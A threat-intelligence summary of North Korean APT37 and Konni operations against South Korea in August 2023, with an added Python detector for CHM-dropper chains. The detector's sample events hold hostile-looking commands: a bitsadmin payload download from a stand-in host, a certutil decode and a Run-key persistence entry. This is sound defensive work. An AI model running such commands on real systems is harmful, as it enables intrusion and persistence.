Analysis of the recent offensive operations conducted by North Korean APT groups
2023-09-13 • Knownsec
Knownsec 404 observed a sharp increase in North Korean APT activity against South Korea during August 2023, with attack timing overlapping the Ulchi Freedom Shield military exercise. The team collected more than 200 deduplicated samples, including more than 80 during the exercise period, and assessed that APT37 accounted for over 90% of the captured activity while Konni also became active later in the month. Initial delivery relied mainly on LNK and CHM droppers, with APT37 using oversized LNK files and Chinotto variants, and Konni using phishing lures such as salary statements, Ministry of Unification-themed documents, and security email password themes. The Konni chain used embedded CHM scripts, VBS and BAT stages, bitsadmin and certutil, registry Run persistence, system and desktop-file collection, and C2 download/upload activity including chainilnk.site. The activity matters because it shows high-volume, intelligence-gathering-focused DPRK operations against South Korean targets with evolving but reusable script-based tradecraft.
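The chain summarised above (CHM opened by hh.exe, a BAT/VBS stage under cmd.exe, bitsadmin/certutil for download and decode, then a HKCU Run key) maps cleanly onto process-creation telemetry. The following detector is an added example written from the defender's side; it is not code from the Knownsec report. It runs a few heuristic rules over Sysmon-style process events and then correlates sibling findings under one parent so that the full chain stands out from a lone certutil invocation. The events, paths, PIDs and the example.invalid host are all constructed for the demo and do not come from the analysed samples.

```python
"""Heuristic detection for a CHM -> script host -> LOLBin -> Run-key chain.

Events are constructed, Sysmon Event ID 1-like records (dicts), not real
telemetry. Field names (pid, ppid, image, cmdline) are an assumption of this
example, not a format the report specifies.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


# Script hosts that a CHM file should not normally spawn through hh.exe.
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\b", re.IGNORECASE)
BITS_RE = re.compile(r"(?i)[/-](transfer|addfile)\b")
CERTUTIL_RE = re.compile(r"(?i)[/-](urlcache|decode|encode)\b")

# Constructed sample events (hypothetical values). PIDs 100-105 form the chain;
# 200/201 are benign admin activity that must not be flagged.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\hh.exe",
     "cmdline": r'hh.exe "C:\Users\u\Downloads\salary_statement.chm"'},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\u\AppData\Local\Temp\st.bat"'},
    {"pid": 103, "ppid": 102, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download /priority normal "
                r"http://example.invalid/x.cab C:\Users\u\AppData\Local\Temp\x.cab"},
    {"pid": 104, "ppid": 102, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -decode C:\Users\u\AppData\Local\Temp\x.cab C:\Users\u\AppData\Local\Temp\x.vbs"},
    {"pid": 105, "ppid": 102, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upd /t REG_SZ '
                r'/d "wscript C:\Users\u\AppData\Local\Temp\x.vbs" /f'},
    {"pid": 200, "ppid": 50, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -hashfile C:\tmp\installer.msi SHA256"},
    {"pid": 201, "ppid": 50, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Apply per-process rules; returns a list of Finding objects."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img, cmd = basename(e["image"]), e["cmdline"]
        parent = by_pid.get(e["ppid"])
        # Rule 1: CHM viewer spawning a script host (CHM dropper executing its payload).
        if img in SCRIPT_HOSTS and parent and basename(parent["image"]) == "hh.exe":
            findings.append(Finding("chm_spawns_script_host", e["pid"], f"{img} under hh.exe"))
        # Rule 2: bitsadmin used as a downloader.
        if img == "bitsadmin.exe" and BITS_RE.search(cmd):
            findings.append(Finding("lolbin_download", e["pid"], cmd))
        # Rule 3: certutil used to fetch or decode a payload (hash checks are ignored).
        if img == "certutil.exe":
            m = CERTUTIL_RE.search(cmd)
            if m:
                rule = "lolbin_download" if m.group(1).lower() == "urlcache" else "lolbin_decode"
                findings.append(Finding(rule, e["pid"], cmd))
        # Rule 4: reg.exe writing a HKCU/HKLM Run value (persistence).
        if img == "reg.exe" and re.search(r"(?i)\badd\b", cmd) and RUN_KEY_RE.search(cmd):
            findings.append(Finding("run_key_persistence", e["pid"], cmd))
    return findings


def correlate(events, findings, min_rules=2):
    """PIDs whose direct children triggered at least `min_rules` distinct rules.

    A single certutil call is noisy on its own; a script-host parent whose
    children both fetch/decode and persist is the chain the report describes.
    """
    by_pid = {e["pid"]: e for e in events}
    per_parent = defaultdict(set)
    for f in findings:
        per_parent[by_pid[f.pid]["ppid"]].add(f.rule)
    return {ppid for ppid, rules in per_parent.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for f in found:
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
    print("correlated parents:", sorted(correlate(SAMPLE_EVENTS, found)))
```

The benign certutil -hashfile event (pid 200) shows why the correlation step matters: individual LOLBin rules are tuned to the download/decode switches, and the chain only fires for the cmd.exe stage (pid 102) whose children trip several different rules. In production the same logic would be fed from Sysmon or EDR process events and the Run-key rule would be backed by registry-write telemetry (Sysmon Event ID 13) rather than reg.exe command lines alone, since a VBS stage can set the value without ever invoking reg.exe.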